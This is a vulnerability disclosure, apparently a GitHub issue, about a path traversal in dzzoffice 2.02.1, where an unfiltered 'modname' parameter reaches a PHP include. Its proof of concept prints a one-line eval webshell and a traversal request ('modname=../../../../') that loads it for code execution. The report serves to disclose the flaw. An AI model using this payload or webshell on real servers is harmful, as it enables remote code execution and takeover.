A Path Traversal vulnerability

[xjzzzxx]

Hello,

I would like to report for a Path Traversal vulnerability in dzzoffice-2.02.1(No permissions required)

In file https://github.com/zyx0814/dzzoffice/blob/master/user/space/about.php

...
$identify=$_GET['modname'];		// Line 13(Source)
$appConfig=DZZ_ROOT.'./dzz/'.$identify.'/config/config.php';				// Line 15(Tainted)
if($identify && file_exists($appConfig)){
	$config=include($appConfig);	// Line 17(Sink)
...

Source from $_GET['modname'] without filtering. And then concated into DZZ_ROOT.'./dzz/'.$identify.'/config/config.php' which allows hackers to have some control over the addresses of the included files, as it is necessary to ensure that the file path ends with /config/config. php.

If combined with vulnerabilities in other sites of the server or other unknown vulnerabilities in this CMS, it is likely to cause the effect of RCE.

Poc

We have set up a webshell in the root directory of the disk where the server is located to demonstrate the combined effects that this vulnerability may cause.

Webshell path: D:\config\config.php, Content:<?php @eval($_POST['pass']) ?>

CMS path: D:\phpstudy_pro\WWW\cms.dzzoffice.com

POST https://cms.dzzoffice.com/user.php?op=about&modname=../../../../

Manual verification